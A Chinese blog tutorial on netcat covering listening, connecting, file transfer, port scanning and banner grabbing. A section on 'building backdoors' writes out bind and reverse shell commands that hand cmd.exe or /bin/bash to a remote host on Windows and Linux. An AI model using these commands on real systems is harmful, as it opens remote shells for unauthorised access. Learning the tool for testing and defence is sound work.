netcat的使用
netcat 的使用
netcat 基本使用
在 netcat 中,原本的服务器被当作是客户端,而原本的客户端被当作是服务端.
从而使服务器连接客户端.
以下则为图示.
基础使用方法
创建一个服务端的方法
nc -l -p [localport]
-l 参数是指监听模式
-p 参数是指指定端口
创建一个客户端(连接服务端)的方法
nc [remote_ip] [remote_port]
使用以上方法后,仅仅实现了一个简单的通信系统,并不能对极其进行命令执行
返回 shell 的使用
nc 服务端(windows)
nc -l -p [local_port] -e cmd.exe
-e 参数是当建立会话后,返回的程序
nc 客户端(kali)
nc 192.168.2.12 [remote_port]
乱码问题可通过输入 chcp 65001 解决
nc 文件传输
创建一个服务端的方法
nc -l -p [local_port] > outfile(指的是输出的文件)
创建一个客户端的方法
nc [remote_ip] [remote_port] < infile(指的是输入的文件)
值得注意的是,无论什么情况(服务端还是客户端),均可传输文件.同时,">"代表接受到的文件,"<"代表要传输的文件
nc 信息探测
端口扫描(不推荐,仅了解)
nc -v -n -z -w1 [target_ip] [start_target_port - end_target_port]
-v 输出详细信息
-n 告诉nc不要使用DNS反向查询IP地址的域名
-z zero I/O 模式,专用于端口扫描.表示连接成功后立即关闭连接,不进行数据交换
-w1 超时设置为1秒
抓取端口 Banner(可能可以获得对方操作系统或其他信息)
echo " " | nc -v -n -w1 [target_ip] [start_target_port - end_target_port]
nc 建立后门
Windows 建立后门
监听型后门(nc 服务端)
nc -l -p [local_port] -e cmd.exe
连接型后门(nc 客户端)
nc [remote_ip] [remote_port] -e cmd.exe
linux 建立后门
监听型后门(nc 服务端)
nc -l -p [local_port] -e /bin/bash
连接型后门(nc 客户端)
nc [remote_ip] [remote_port] -e /bin/bash
nc 命令参数
-d 在后台运行,常用于后门建立
-e 执行某个程序,常用于后门建立
-G gateway 设置网关,常用于突破内网限制
-g num 路由跳数
-i sec 设置发送每一行数据的时间间隔
-l 设置nc处于监听状态等待连接
-L 基本同-l,但当服务端断开,服务端依旧回到等待状态
-p port 设置本地监听的端口号
-n 告诉nc不要使用DNS反向查询IP地址的域名
-o file 设置传输十六进制的数据
-r 设置nc随机化的端口
-s addr 设置nc源地址
-t 回复telnet的请求数据包
-u 设置nc使用UDP模式
-v 输出详细信息
-w sec 设置连接超时秒数
-z zero I/O 模式,专用于端口扫描.表示连接成功后立即关闭连接,不进行数据交换
本文作者:wedfrgt
本文链接:https://www.cnblogs.com/wedfrgt/p/15911340.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步